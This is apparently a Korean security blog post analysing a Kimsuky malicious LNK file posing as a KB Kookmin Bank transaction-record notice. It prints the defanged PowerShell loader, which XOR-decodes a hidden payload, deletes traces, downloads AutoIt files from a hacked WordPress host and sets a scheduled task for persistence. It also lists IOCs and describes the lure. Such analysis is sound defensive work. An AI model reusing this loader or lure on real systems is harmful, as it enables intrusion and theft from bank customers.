북한 김수키(Kimsuky) 에서 만든 악성코드-KB국민은행 거래내역 제출 안내서.hwp.lnk

오늘도 김수키(Kimsuky) 에서 만든 악성코드인 KB국민은행 거래내역 제출 안내서.hwp.lnk에 대해 글을 적어보겠습니다.
ファイル名:KB국민은행 거래내역 제출 안내서.hwp.lnk
サイズ:1 MB
MD5:f5842320e04c2c97d1f69cebfd47df3d
SHA-1:3bc4f453d217539c9fce36b84eebea2330e1ebdf
SHA-256:3a2ec9a8ccb085bb6f68909ca8a2819fd517e6e02b3e7fa52e30198c56f2637a
해당 악성코드는 PowerShell로 이루어진 악성코드이며 기본적으로 실행 시 한글과 컴퓨터를 실행하게 돼 있습니다.

악성코드 에 포함된 PowerShell 코드

PowerShell 악성코드

StringData
{
 namestring: Type: HWP 2022 Document
 Size: 27 KB
 Date modified: 03/23/2025 14:51
 relativepath: not present
 workingdir: not present
 commandlinearguments: /c C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell(.)exe -Command 
 "$ettadofx=0;<#Add-AppPvisionedPackage#>$z8bh5s5g='lengt(h)';<#Add(-)AppProvisionedPackage#>$
 jxhwdsbh(=)Get-Location;$smo(b)lrhi=&(gcm *et-(C)hild*) *.lnk;<#Add-(A)p?ProvisionedPackage#>
 $smoblrhi=$smoblrhi|where-object{$_.$z8bh5s5g -eq 0x0000C6D5};<#Add-???ProvisionedPackage#>
 $o05idv71=$smoblrhi;<#Add-AppProvisionedPackage#>$smoblrhi=$smoblrhi|Select-Object -Expand
 Property Name;<#Add-AppProvisionedPackage#>if([string]::IsNullOrEmpty($smoblrhi)){$ettadof
 x=1;<#Add-AppProvisio(n)edPackage#>$jxhwdsbh=$env:USERPROFILE;<#Add-AppProvisionedPackage#
 >$jxhwds(b)h=$jxhwdsbh+'\appdata\local\t(e)mp';<#Add-AppProvision(ed)Package#>$smoblrhi=Ge
 t-ChildItem -Path $jxhwdsbh -Recurse -Filter *(.l)nk|where-object{$_.$z8bh5s5g -eq 0x0000C
 6D5}|ForEach-Ob(j)ect{$_.FullName}|Select-Object -First 1;<#Add-AppProvisionedPac(k)age#>$
 o05idv71=$smoblrhi};<#Add-AppProvisionedPackage#>$xpcxlud2=$smoblrhi(.)sub(s)tring(0,$smob
 lrhi.length-4);$gejctuj3=[System.IO.BinaryReader]::new([Syste(m).IO.File]::open($s(m)oblrh
 i,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.I(O).FileShare]::Read));
 try{$gejctuj3.BaseS(t)ream.Seek(0x000017E0,[System.IO.SeekOrigin]::Begin);$ct0jly9m=$gejct
 uj3.Re(a)dBytes(0x00008600);}finally{$gejctuj3.Close()};$li7ytxfn=0;$hwo5l155=0;$rl(v)kt0b
 6=$ct0jly9m.count;while ($li7ytxfn -lt $rlvkt0b6){$aa1z10h7=0x01;$hw(o)5l155=$li7ytxfn-[m
 ath]::Floor($li7ytxfn/$aa1z10h7)*$aa1z10h7;$woj6t37q=0xD(1)+$byRem;$ct0jly9m[$li7ytxfn]=$
 ct0jly9m[$li7ytxfn] -bxor $woj6t37q;$li(7)ytxfn++};[System.IO.File]::WriteAllBytes($xpcxl
 ud2,$ct0jly9m);if($ett(a)dofx -eq 1){$fdpl13dr=$(x)pcxlud2}else{$fdpl13dr='.\'+$xpcxlud2}
 ;& $fdpl13dr;remove-(i)tem -path $o05idv71 -force;$o2w092js='C:\Users\Public\Music\';Set-
 Location -Path $o2w092js;Invoke-WebR(e)quest -Uri 'hxxps://igamingroundtable(.)com/wp-adm
 in/css/plugin/communication/?PCR=GapiD0' -OutFile 'AutoIt3(.)exe';Invoke-WebRequest -Uri 
 'hxxps://igamingroundtable(.)com/wp-admin/css/plugin/communication/?qpk=gQqpI1' -OutFile 
 'ISYuiAb(.)pdf';$khd8169b=$o2w092js+'AutoIt3.exe';$t6kn95fc=$o2w092js+'ISYuiAb(.)pdf';$dd
 wv8c7g = New-ScheduledTaskAction -Execute $khd8169b -Argume(n)t $t6kn95fc;$y98999bw = New
 -ScheduledTaskTrigger -Once -At (Get-Date)(.)AddMinutes(1) -RepetitionInterval (New-TimeS
 pan -Minutes 1) -RepetitionD(u)ration (New-TimeSpan -Days 365);$iyfoh8hx = New-ScheduledT
 a(s)kPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Limited;(R)egister-
 ScheduledTask -Action $ddwv8c7g -Trigger $y98999bw -Principal $(i)yfoh8hx -TaskName 'ISYu
 iAb' -Description 'CJKEtYHuqDWOQaUsykoI'"
 iconlocation: (.)hwp
}

악성코드 분석

PowerShell->LNK->AutoIt 백도어->지속적 실행(1분 간격,1년)
1.정보
문서 형식:HWP 2022
명령 실행:
정상 문서가 PowerShell을 호출하는 것 자체가 비정상적임
2. LNK 파일 탐색 및 선택
현재 디렉터리에서. lnk 파일 검색
파일 크기가 정확히 50901 바이트(0xC6D5) 인 LNK만 선택->공격자가 작성한 특정 사이즈의 LNK 페이로드 를 찾는 것
실패할 때: 폴더를 재귀해서 계속 뒤져서 같은 크기의 LNK를 찾음
3.LNK 내부에서 숨겨진 페이로드 추출

KB국민은행 거래내역 제출 안내서 소명자료 요청

LNK 파일 내부 offset 0x17E0(6112) 위치부터 34,304 바이트(0x8600)를 읽어옴
즉 LNK 파일 내부 특정 위치에 암호화된 악성 바이너리가 숨겨져 있음
4.XOR(0xD1) 복호화
페이로드 전체를 단일 바이트 XOR 0xD1 복호화
.lnk 확장자를 제거한 파일명으로 저장
즉 해당 LNK는 실제 악성 실행파일을 숨긴 컨테이너 역할
5 복호화된 페이로드 실행 및 lnk 파일 삭제
복호화 후 생성된 파일을 실행 및 원본 LNK(증거)를 삭제하여 흔적 제거
6.AutoIt 기반 백도어 다운로드
취약한 WordPress 사이트 해킹해서 심어 놓은 악성코드에서 파일 다운로드
다운 받는 파일:
AutoIt3.exe
ISYuiAb.pdf:AutoIt 스크립트 가능성 큼 즉 AutoIt 기반 악성 스크립트를 실행시키는 구조
7. 지속성(Persistence) 확보
1분마다 AutoIt 악성 스크립트를 재실행하는 예약 작업 생성
작업명:ISYuiAb
실행경로:C:\Users\Public\Music\
지속 기간:365일(1년)

작업스케줄러에 예약된 목록

8.IOC
파일 경로
C:\Users\Public\Music\AutoIt3.exe
C:\Users\Public\Music\ISYuiAb.pdf

pestudio 로 본 결과

네트워크

igamingroundtable(.)com
/wp-admin/css/plugin/communication/?PCR(=)Ga(p)iD0
/wp-admin/css/plugin/com(m)unication/?qpk=gQ(q)pI1

와이샤크 로 보는 트래픽

packets_20251110_031318.pcap

0.10MB

 

Scheduled Task(작업 스케줄러)
Task Name: ISYuiAb
해당 악성코드 를 실행을 하면 KB국민은행 거래내역 제출 안내서 소명서가 돼 있으며 최근 1년간 거래내용을 점검하였다. 그리고 일부 거래 내역에 대해 추가 확인이 필요한 사항이 확인 필요한 다는 내용이며
귀하의 국민은행 계좌에 대해 최근 1년간 거래내역을 점검하는 과정에서 다음과
같은 일부 거래 내역에 대해 추가 확인이 필요한 사항이 확인되었습니다.
2. 확인필요 거래내역
2024년 11월 15일: 원주서비스센타에로의 15,000,000원 송금
2025년 2월 7일: 이?원(개인)으로의 8,500,000원 송금
2025년 3월 22일: 해외(미국 소재 Lux Capital)로의 25,000 USD 송금
3. 제출자료
위 거래의 구체적인 목적 및 배경을 설명하는 소명서
관련 계약서, 세금계산서, 영수증 등 객관적인 증빙자료
자금 출처를 확인할 수 있는 자료(예: 급여명세서, 대출 관련 서류 등)
기타 필요한 경우, 추가 설명 자료
으로 돼 있는 것이 특징입니다.
C:\Users\Public\Music\Autolt3.exe C:\Users\Public\Music\ISYuiAb.pdf
으로 작업스케줄이 잘 등록이 돼 있는 것을 확인할 수가 있습니다.
2025.11.18에 AutoIt3 파일을 분석하려고 했지만, 파일이 다운로드 되지 않아서 패스
결론 기본적인 보안 수칙을 지키는 것을 적극적으로 권장합니다.